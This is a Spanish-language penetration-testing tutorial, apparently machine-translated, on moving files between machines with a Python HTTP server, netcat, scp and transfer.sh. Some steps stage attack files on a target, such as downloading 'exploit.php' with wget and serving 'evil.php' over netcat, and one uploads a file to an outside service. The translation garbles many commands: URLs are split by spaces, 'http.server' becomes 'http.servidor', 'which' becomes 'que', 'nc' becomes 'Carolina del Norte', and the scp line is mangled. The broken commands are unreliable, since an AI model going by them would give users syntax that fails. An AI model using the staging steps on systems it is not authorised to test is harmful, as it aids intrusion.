La transferencia de exploits, los scripts de Python y la carga de módulos a menudo son necesarios durante las actividades de prueba de penetración. Dado que el terminal es la herramienta más utilizada, es esencial comprender los conceptos básicos de la transferencia de archivos.
Un probador de lápiz debe estar bien equipado con diferentes trucos para transferir archivos desde un servidor remoto y de un directorio a otro. En este tutorial, discutiremos diferentes formas de transferir archivos usando la línea de comandos.
1. Servidor Python
Python es el paquete básico que viene preinstalado en casi todos los sistemas basados en Debian. Para transferir un archivo de una máquina a otra, haga lo siguiente;
Python2:
Cambie al directorio donde existe el archivo que desea transferir. Inicie un servidor Python simple. Ingrese el siguiente comando;
$ python -m SimpleHTTPServer 8080
Ahora ve a la máquina donde quieres transferir el archivo. Utilice el siguiente comando para descargar el archivo;
$ wget http: // 192.168.43.177: 8080 / archivo
Recuerde reemplazar la IP, el número de puerto y el nombre del archivo.
Python3:
Todo lo que esté escrito en python2 casi siempre se romperá en python3. Entonces también miramos cómo transferir un archivo usando python3.
En el caso de python3, ingrese el siguiente comando para iniciar un servidor Python simple.
$ python3 -m http.servidor 8080
Para descargar el archivo en el destino, ingrese el siguiente comando;
$ wget http: // 192.168.43.177: 8080 / exploit.php
2. Netcat
Netcat es una poderosa utilidad para transferir archivos desde cualquier máquina remota a una máquina local. Puede que no siempre esté instalado. Puedes comprobar si existe o no ingresando;
$ que netcat
Alternativamente, ingresando;$ que nc
Cree un servidor netcat con el siguiente comando;
$ nc -nlvp 8080 < evil.php
Ahora vaya a la máquina de destino e ingrese lo siguiente para descargar el archivo;
$ nc -nv 192.168.43.177 8080> mal.php
Reemplazar Carolina del Norte
con netcat
en los comandos anteriores si nc no funciona o no está instalado correctamente.
3. SCP
Secure Copy Protocol es una poderosa herramienta para transferir archivos. Resulta útil especialmente cuando desea transferir directorios. También se usa principalmente para transferencias de archivos a través de ssh.
Para transferir archivos a través de ssh, ingrese el siguiente comando en la máquina de envío;
$ scp -i nuevo.prueba de pem.py ubuntu @ 18.220.68.229: / inicio / ubuntu
Donde -i representa la clave pública para el inicio de sesión ssh, prueba.py es el archivo que se va a transferir y / home / ubuntu es el directorio de destino donde queremos guardar el archivo.
Para descargar un archivo desde la máquina remota, ingrese el siguiente comando;
$ scp root @ 192.168.43.177: / directorio_remoto / archivo / local / directorio
4. Transferir.sh
Puede utilizar esta herramienta de terceros para transferir archivos. Puede ser útil cuando no tienes una máquina con IP pública y aún tienes que transferir los archivos. El siguiente comando carga el archivo a la transferencia.servidores de sh;
$ curl --upload-file ./expediente.txt https: // transferencia.sh / archivo.TXT
Para descargar el archivo, ingrese el siguiente comando;
$ curl https: // transferencia.sh // archivo.txt -o archivo.TXT
Transferir.sh todavía está en desarrollo y es posible que no siempre funcione.
Conclusión
Las herramientas de línea de comandos nos brindan la capacidad de transferir archivos de varias maneras. Pueden parecer un poco complicados, pero ponerlos en práctica brinda la capacidad de administrar archivos fácilmente, especialmente cuando una opción de GUI no está disponible.